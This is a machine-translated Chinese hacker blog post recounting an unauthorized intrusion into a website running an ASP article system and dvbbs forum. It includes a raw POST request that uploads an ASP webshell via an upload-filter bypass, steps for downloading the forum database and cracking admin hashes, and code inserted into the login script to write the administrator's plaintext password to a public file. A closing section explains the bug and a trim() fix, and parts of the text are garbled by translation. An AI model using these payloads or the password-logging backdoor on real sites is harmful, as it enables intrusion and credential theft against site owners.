This is how I access a hacker site.

Source: evil baboons China
Author: evil cat [e.s. T] (evilcat [e.s. T])

I recently had a holiday at home. There was nothing to do. I had to spend a lot of time surfing the Internet. Today I 've been switching to several secure sites, and all the new articles on the site have been transferred to e.s. t's forum is on ). Idle is also idle, simply look at the sites connected to these sites, maybe something new.
Now, let's take a look at the site of this friendly connection. Well, the website artist did a good job. After reading the article, there was nothing too new. When I leave the site, I find that the page System of the site is very familiar, such as a dynamic article system ~~ I guess it's a free power article system. There is also a dvbbs7.0sp2 on the site. Out of my career problems, I am interested in this site • Haha, register an account in the Free Power Article system. I checked the article management in the user control panel. I don't mean that everyone should know what I want to do • upload, haha. Check the location where the uploaded software says "sorry, this site is not allowed to upload". It is also a hacker's website Upload Vulnerability. How can this problem be solved. I remember that I posted an article titled breakthrough blocking power Article Upload Vulnerability reuse in the blacklist XFile publication. The article shows that when a user is prohibited from registering, we can still use Post attacks to upload ASP Trojans. In this case, is this attack method also effective? Well, you can try it. I will first submit this page http://www.xxx.com/upload_soft.asp page to go back !" We submit the http://www.xxx.com/upfile_soft.asp again
The page returns "select the file you want to upload first !" Haha, this indicates that the NC can be used to submit the datagram for post attacks. The post content is of course an ASP Trojan. From now on, the probability of success is only 50% because if the other party fixes the upload vulnerability, the file format is incorrect even if post is used. I found a packet that I used to use the free power Upload Vulnerability and changed it. Then I submitted it using nc. Hey, the upload was successful. I don't have to talk about how to modify the datagram and exploit the Upload Vulnerability. You should be familiar with it.
The previous post datagram is given below:

Code:
Post/upfile_soft.asp HTTP/1.1 <br/> Accept: image/GIF, image/X-xbitmap, image/JPEG, image/pjpeg, application/X-Shockwave-flash, application/vnd. MS-Excel, application/vnd. MS-PowerPoint, application/MSWord, */* <br/> Referer: [url] http://www.xxx.com/upload_soft.asp#/url] <br/> Accept-language: ZH-CN <br/> Content-Type: multipart/form-data; boundary = ------------------------- 7d531c251_a0c <br/> Accept-e Ncoding: gzip, deflate <br/> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv1; Maxthon ;. net CLR 1.1.4322) <br/> HOST: [url] www.xxx.com [/url] <br/> Content-Length: 1497 <br/> connection: keep-alive <br/> cache-control: No-Cache <br/> COOKIE: aspsessionidqscqsada = iceejphaljlebhkfiojdplevels; 831225 = cookiedate = 1 & Password = 635d6ca36de2ff6f & userlevel = 999 & username = cat; <br/> --------------------- -------- 7d531c2520.a0c <br/> content-Disposition: Form-data; name = "FILENAME"; filename = "C:/Documents and Settings/e. CAT/desktop/injection/mm. ASP. RAR "<br/> Content-Type: text/plain </P> <p> <% dim objfso %> <br/> <% dim fdata %> <br/> <% dim objcountfile %> <br/> <% on error resume next %> <br/> <% set objfso = server. createobject ("scripting. fileSystemObject ") %> <br/> <% if trim (Request (" syfdpath ") <>" "Then %> <br/> <% fdata = Re Quest ("cyfddata") %> <br/> <% set objcountfile = objfso. createtextfile (Request ("syfdpath"), true) %> <br/> <% objcountfile. write fdata %> <br/> <% if err = 0 then %> <br/> <% response. write "<font color = Red> Save success! </Font> "%> <br/> <% else %> <br/> <% response. Write" <font color = Red> Save unsuccess! </Font> "%> <br/> <% end if %> <br/> <% err. clear %> <br/> <% end if %> <br/> <% objcountfile. close %> <br/> <% set objcountfile = nothing %> <br/> <% set objfso = nothing %> <br/> <% response. write "<form action = ''' method = post>" %> <br/> <% response. write "Save the <font color = Red> absolute path of the file (including the file name, for example, D:/web/X. ASP): </font> "%> <br/> <% response. write "<input type = text name = syfdpath width = 32 size = 50>" %> <br/> <% response. write "<br>" %> <br/> <% response. write "absolute path of this file" %> <br/> <% = server. mappath (request. servervariables ("script_name") %> <br/> <% response. write "<br>" %> <br/> <% response. write "content of the input horse:" %> <br/> <% response. write "<textarea name = cyfddata Cols = 80 rows = 10 width = 32> </textarea>" %> <br/> <% response. write "<input type = submit value = save>" %> <br/> <% response. write "</form>" %> <br/> --------------------------- 7d531c251_a0c <br/> content-Disposition: Form-data; name = "Submit" </P> <p> upload <br/> ----------------------------- 7d531c251_a0c-<br/>
[Ctrl + A select all]

Write the trojan that has been submitted to the Ocean 2005 again to see what the website directory looks like. The permission lock is very dead,
The command can only be viewed in the website directory, and the command cmd cannot be executed. Do you still see a dvbbssp2 SP2 instance, no matter how many commands you run? Download the database and check it out first. After downloading the file, use the Database Assistant browser. On the forum page, you can see that XXXX is the forum administrator. In the database's dv_user, the table and the dv_admin table show that the user names and passwords at the front and back ends of the Forum are different. Then, use the database browser to check the content field in the dv_log table, which is the keyword password, check whether there is a clear administrator password, from the dv_user table at the front end, we can see that the front-end Administrator name is XXXX and the back-end Administrator name is also a 008, is it estimated that the front-end password is the same as the backend password 008? I used the MD5 converter to verify my guess. I guessed it again, it seems that hackers also need luck. All right, I know the password of the front-end and back-end of dvbbs. If aspshell loses the password of the Administrator, you can back up a shell. Next, let's take a look at the free power database. the MD5 value of the administrator password in the admin table of the free power database is different from that of the dynamic network. It seems that the Administrator still has some security awareness. I had a few guesses, but this time I was not so lucky. I didn't guess it again. But it doesn't matter. I still have a way to get his password. After analyzing the free power source code, we can see that the password verification relies on the admin_chklogin.asp file, and we will continue to analyze it. Some code of the file is as follows:

Code:
Username = Replace (TRIM (Request ("username"), "'", "") <br/> Password = Replace (TRIM (Request ("password ")), "'", "") <br/> checkcode = Replace (TRIM (Request ("checkcode ")),"'","") <br/> If username = "" Then <br/> founderr = true <br/> errmsg = errmsg & "<br> <li> the user name cannot be blank! </LI> "<br/> end if <br/> If Password =" "Then <br/> founderr = true <br/> errmsg = errmsg &" <br> <li> the password cannot be blank! </LI> "<br/> end if <br/> If checkcode =" "Then <br/> founderr = true <br/> errmsg = errmsg &" <br> <li> The Verification Code cannot be blank! </LI> "<br/> end if <br/> If SESSION (" checkcode ") = "" Then <br/> founderr = true <br/> errmsg = errmsg & "<br> <li> your logon time is too long. Please return to the logon page again to log on. </LI> "<br/> end if <br/> If checkcode <> CSTR (Session (" checkcode ")) then <br/> founderr = true <br/> errmsg = errmsg & "<br> <li> the verification code you entered is inconsistent with that generated by the system. Please enter it again. </LI> "<br/> end if <br/> If founderr <> true then <br/> Password = MD5 (password) <br/> SQL = "select * from Admin where Password = '" & password & "' and username = '" & username & "'" <br/> set rs1_nt2003.exe cute (SQL) <br/> If RS. bof and Rs. EOF then <br/> founderr = true <br/> errmsg = errmsg & "<br> <li> incorrect user name or password !!! </LI> "<br/> else <br/> If password <> RS (" password ") then <br/> founderr = true <br/> errmsg = errmsg & "<br> <li> incorrect user name or password !!! </LI> "<br/> else <br/> nt2003.execute (" Update admin set lastloginip = '"& request. servervariables ("remote_addr") & "', lastlogintime ='" & now & "', logintimes = logintimes + 1 where username ='" & username &"'") <br/> session. timeout = clng (nt2003.site _ setting (15) <br/> SESSION ("adminname") = username <br/> Rs. close <br/> set rs = nothing <br/> response. redirect "admin_index.asp" <br/> end if <br/> Rs. close <br/> set rs = nothing <br/> end if <br/> If founderr = true then <br/> call writeerrmsg () <br/> end if <br/>
[Ctrl + A select all]

It can be seen that some basic errors are not found, if both founderr <> true, the program will convert the password entered by the user to MD5 and then hand it to the database for query. So far, we will use this code

Code:
Dim fsoobject <br/> dim tsobject <br/> set fsoobject = server. createobject ("scripting. fileSystemObject ") <br/> set tsobject = fsoobject. createtextfile (server. mappath ("cat.txt") tsobject. write CSTR (Request ("password") <br/> set fsoobject = nothing <br/> set tsobject = nothing <br/>
[Ctrl + A select all]

Insert

Code:
If password <> RS ("password") Then <br/> founderr = true <br/> errmsg = errmsg & "<br> <li> incorrect user name or password !!! </LI> "<br/> else <br/>
[Ctrl + A select all]

Next, the Administrator writes the Administrator's password to cat.txt. Let's go to http://www.xxx.com/cat.txtmanager's password. Although this idea is not my original idea, it is still the first option to use this method for free power. In fact, some friends say that webshell has all the reasons why I am still so interested in the user's password, hey, the Administrator's personal privacy, such as QQ, e-mail, and FTP, should be the same as one of the passwords • Do not do this, i'm just doing a test • so we 'd better not use the same password. The intrusion has come to an end for the moment, and permission escalation is a future issue. I would like to explain to you why post attacks can be carried out in the free-powered article system.

The reason for this success is two reasons: first, the possibility of post attacks when a free power program is saved, and second, the program has an upload vulnerability. Basically, it is the Upload Vulnerability.
The following is an analysis of the first problem:
When we start to submit this page at http://www.xxx.com/upload_soft.asp
"Sorry, this website cannot upload files !"
Let's take a look at some of the source code of upload_soft.asp:

Code:
<% <Br/> If nt2003.site _ setting (7) = 1 then <br/>%> <br/> <form action = "upfile_soft.asp" method = "Post" name = "form1" onsubmit = "Return check () "enctype =" multipart/form-Data "> <br/> <input name =" FILENAME "type =" file "class =" tx1 "size =" 40 "> <br /> <input type = "Submit" name = "Submit" value = "Upload" style = "border: 1px double RGB (88,88, 88); Font: 9pt "> <br/> </form> <br/> <% <br/> else <br/> response. write "sorry, this website cannot upload files Item! "<Br/> end if <br/> %> <br/>
[Ctrl + A select all]

We noticed that if nt2003.site _ setting (7) = 1, the upload form will appear.
We submit http://www.xxx.com/upfile_soft.asp
The page returns "select the file you want to upload first !"
Let's take a look at some of the source code of upfile_soft.asp:

Code:
<% <Br/> nt2003.getsite _ setting () <br/> const upload_type = 0' upload method: 0 = No fear of component-less upload class, 1 = FSO upload 2 = lyfupload, 3 = aspupload, 4 = chinaaspupload <br/> const saveupfilespath = "uploadsoft" <br/> const upfiletype = "RAR | zip | exe | MPG | RM | WAV | mid" <br/> nt2003.site _ setting (7) = 1' pay attention to this !!!! <Br/> const maxfilesize = 102400 <br/> • <br/> sub upload_0 () 'Use environment without component upload class' <br/> set upload = new upfile_class ''to create an upload object <br/> upload. getdata (104857600) 'to get the uploaded data. The maximum size of the uploaded data is 100 mb. <br/> If upload. err> 0 then' <br/> select case upload. err <br/> case 1 <br/> response. write "select the file you want to upload first! "<Br/> case 2 <br/> response. write "the total size of the file you uploaded exceeds the maximum limit (100 MB)" <br/> end select <br/> response. end <br/> end if <br/>
[Ctrl + A select all]

Directly accessing upfile_soft.asp will prompt us to upload the file, so that we will not be able to post the file in the past.
In addition, the free power does not check users' cookies during user uploads, which is very dangerous. Bbsgood is doing well in this regard. Although bbsgood has the upload vulnerability, the official website has not enabled the upload function and is not hacked, this is because bbsgood checks the content in users' cookies during user uploads. For example, the following section of bbsgood in upload_id.asp is written:

Code:
Username = request. cookies ("username") <br/> Password = request. cookies ("password") <br/> If request. cookies ("login") = "Y" and imageid> 0 then <br/> set rs1_conn.exe cute ("select top 1 ID, user name, password, permission, account Status from bbsgood_user where username = '"& username &"' ") <br/> If (RS. bof and Rs. EOF) or RS ("password") <> password then <br/> response. write I + 1 & ", you do not have the upload permission <br>" <br/> else <br/> If (imageid = 1 and (RS ("permission ") = "admin" or RS ("permission") = "bbsadmin") or (imageid = 2 and RS ("permission") = "admin ") or (imageid = 3 and RS ("permission") = "bbsadmin") or imageid = 4 then <br/> filename = SaveFile (formfieldname, filepath, maxfilesize, savtype, fsotype, forbidtype) 'save and get the file name <br/> else <br/> response. write I + 1 & ", you do not have the upload permission <br>" <br/> end if <br/>
[Ctrl + A select all]

If it weren't for this code, I wanted to find that the official website was hacked when the upload vulnerability was discovered ••••••

The following is an analysis of the second problem:
I want to upload vulnerabilities that are familiar to everyone. There are a lot of articles to analyze the causes of the vulnerabilities. Here I will talk about the cause again. asp (with spaces below) is not equal to ASP, windows will automatically remove spaces when there are spaces, so when we upload an ASP file, it will become an ASP file. However, I found that there were very few articles on how to fix the upload vulnerability on the Internet. I did not find any articles on Google for a long time. The bots that exploit the upload vulnerability do not fix the vulnerability. The common practice is to delete files or something. This is really bad. In fact, we can use the trim function to fix vulnerabilities. The following describes the trim function in msdn:
Trim Function
Returns a copy of a string without leading spaces (ltrim), trailing spaces (rtrim), or both leading and trailing spaces (TRIM ).
Ltrim (string)
Rtrim (string)
Trim (string)
The string argument is any valid string expression. If string contains null, null is returned.
Remarks
The following example uses the ltrim, rtrim, and trim functions to trim leading spaces, trailing spaces, and both leading and trailing spaces, respectively:
Dim myvar
Myvar = ltrim ("VBScript") 'myvar contains "VBScript ".
Myvar = rtrim ("VBScript") 'myvar contains "VBScript ".
Myvar = trim ("VBScript") 'myvar contains "VBScript ".

We know that free power uses the unafraid upload class and references some code in upfile_class.asp with the upload vulnerability:

Code:
Ofileinfo. filename = mid (sfilename, limit Rev (sfilename, "/") + 1) <br/> ofileinfo. filepath = left (sfilename, limit Rev (sfilename, "/") <br/> ofileinfo. fileext = mid (sfilename, limit Rev (sfilename ,". ") + 1) <br/>
[Ctrl + A select all]

As you can see, there is no space to filter. We can use the trim function to fix it like this:

Code:
Ofileinfo. filename = trim (mid (sfilename, limit Rev (sfilename, "/") + 1) <br/> ofileinfo. filepath = trim (left (sfilename, limit Rev (sfilename, "/") <br/> ofileinfo. fileext = trim (mid (sfilename, limit Rev (sfilename ,". ") + 1) <br/>
[Ctrl + A select all]

Well, this is much better. For the mobile network Upload Vulnerability, you can compare the previous upfile. asp in the mobile network with the current upfile. asp to understand how to fix it.
The problem is also analyzed. Check out the webmaster's e-mail and tell him that the website has an upload vulnerability and has been fixed for him, all webshells are clear. Remember to change the password of the article administrator and BBs. It's enough to learn something from this intrusion. Why should we change the home page to show off ourselves? Isn't this a good way to improve network security in China? Be a good boy ••••••••••